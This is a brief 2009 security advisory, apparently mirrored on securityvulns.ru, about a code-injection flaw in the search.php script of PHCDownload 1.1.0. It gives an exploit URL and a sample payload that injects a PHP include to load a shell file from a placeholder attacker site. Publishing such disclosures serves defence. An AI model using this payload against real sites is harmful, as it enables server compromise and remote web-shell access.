Computer Security

Security Advisory: PHCDownload 1.1.0 Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  New Cross-Site Scripting vulnerability in Drupal

  Cross-Site Scripting vulnerability in Drupal

  Cross-Site Scripting vulnerability in Drupal

From:contact_(at)_vnbrain.net <contact_(at)_vnbrain.net>
Date:20.02.2009
Subject:PHCDownload 1.1.0 Vulnerabilities

A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy.
PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vuls file: seach.php
Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called.

Exploit: http://[site]/[path_to_script]/search.php
Input: ">< <?php PHP code here ?>

Example: http://[site]/[path_to_script]/search.php?string=">< <?php include("http://attacker_site/SHELL_FILE"); ?>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru